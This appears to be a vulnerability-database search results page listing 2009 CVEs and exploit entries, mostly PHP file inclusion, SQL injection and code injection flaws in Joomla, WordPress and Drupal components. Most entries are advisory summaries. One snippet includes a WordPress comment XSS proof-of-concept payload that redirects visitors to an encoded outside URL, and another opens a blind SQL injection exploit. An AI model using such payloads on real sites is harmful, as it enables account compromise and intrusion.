7219 matches found
CVE-2009-2634
PHP remote file inclusion vulnerability in toolbarext.php in the MediaLibrary commedialibrary component 1.5.3 Basic for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter...
CVE-2009-2635
PHP remote file inclusion vulnerability in toolbarext.php in the RealEstateManager comrealestatemanager component 1.0 Basic for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter...
Allomani Mobile 2.5 Remote Blind SQL Injection Exploit
No description provided by source. ?php iniset"maxexecutiontime",0; printr' || || | || o,7 || . o7 || q||| o///, : / / . /QQQQQQQQQQQQQQQQQQQ\ q Allomani Mobile v2.5 /QQQ/\QQQ\ Blind SQL inj. exploit /QQQQQ/ \QQQQQQ\ q GET 3 /QQQQ/ QQQQ\ /QQQQ/ \QQQQ\ q http://allomani.com |QQQQ/ By Qabandi \QQQQ...
iShowMusic V1. 2 Write a shell vulnerability-vulnerability warning-the black bar safety net
A few days before the announcement of the vulnerability, these days quite busy, today only see. Just some time ago using this program to do a music station, in the own Station test is successful, by the way also fill the lower holes. -------- Vulnerability description: iShow Music is a basic set...
TikiWiki jhot Remote Command Execution
TikiWiki contains a flaw that may allow a malicious user to execute arbitrary PHP code. The issue is triggered due to the jhot.php script not correctly verifying uploaded files. It is possible that the flaw may allow arbitrary PHP code execution by uploading a malicious PHP script resulting in a...
wordpress281 comments show xss vulnerability-vulnerability warning-the black bar safety net
Ghost boy’blog, XEYE’s blogto assist in testing. POC: the 1. In the comment URL field, fill in the 2. 3. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location. href=String. fromCharCode104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,11...
DM FileManager <= 3.9.4 RFI Vulnerability - Active Check
DM FileManager is prone to a remote file inclusion RFI vulnerability. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
CVE-2009-2396
PHP remote file inclusion vulnerability in template/album.php in DM Albums 1.9.2, as used standalone or as a WordPress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITYFILE parameter...
CVE-2009-2399
PHP remote file inclusion vulnerability in dm-albums/template/album.php in DM FileManager 3.9.4, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITYFILE parameter...
Format string
Drupal 6.x before 6.13 does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibly PHP code via a crafted user...
CVE-2009-2371
The CVE-2009-2371 entry affects the Drupal module Advanced Forum (6.x) prior to 6.x-1.1. The issue arises when the module allows users to modify their signatures after the comment format has been switched to an administrator-controlled input format, enabling remote authenticated users to inject a...
Unrestricted file upload
Unrestricted file upload vulnerability in index.php in phpGreetCards 3.7 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a via a link that is listed by userfiles/numbershell.php...
Code injection
Multiple static code injection vulnerabilities in CMS Chainuk 1.2 and earlier allow remote attackers to inject arbitrary PHP code 1 into settings.php via the menu parameter to adminsettings.php or 2 into a content/=NUMBER.php file via the title parameter to adminnew.php...
CVE-2009-2331
Multiple static code injection vulnerabilities in CMS Chainuk 1.2 and earlier allow remote attackers to inject arbitrary PHP code 1 into settings.php via the menu parameter to adminsettings.php or 2 into a content/=NUMBER.php file via the title parameter to adminnew.php...
V-webmail Multiple PHP Remote File Inclusion Vulnerability
The host is running V-webmail and is prone to Multiple PHP Remote File Inclusion vulnerability. OpenVAS Vulnerability Test $Id: gbv-webmailmultfileincvuln.nasl 4906 2017-01-02 13:06:55Z teissa $ V-webmail Multiple PHP Remote File Inclusion Vulnerability Authors: Sharath S Copyright: Copyright c...
CVE-2009-2218
Multiple PHP remote file inclusion vulnerabilities affect phpCollegeExchange 0.1.5c when register_globals is enabled. The flaws allow an attacker to trigger arbitrary PHP code execution by supplying a URL in the home parameter to several PHP scripts (i_head.php, i_nav.php, user_new_2.php, house/m...
CVE-2009-2182
Multiple PHP remote file inclusion vulnerabilities in Campsite 3.3.0 RC1 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALSgcampsiteDir parameter to 1 adpopup.php, 2 camphtml.php, 3 initcontent.php, 4 logout.php, 5 menu.php, and 6 set-author.php in admin-files/; 7...
Acajoom Component for Joomla! <= 3.2.6 Backdoor Detection
Acajoom, a third-party component for Joomla! for managing mailing lists, newsletters, auto-responders, and other communications, is running on the remote host. This version of Acajoom is equal or prior to 3.2.6. It is, therefore, affected by a backdoor in the self.acajoom.php script. An...
Remote file inclusion
PHP remote file inclusion vulnerability in firestats-wordpress.php in the FireStats plugin before 1.6.2-stable for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the fsjavascript parameter...
WordPress FireStats Plugin <= 1.6.1 - Remote File Inclusion
Because of this vulnerability in firestats-wordpress.php, the attackers can execute arbitrary PHP code via a URL in the "fsjavascript" parameter. Solution Update the plugin...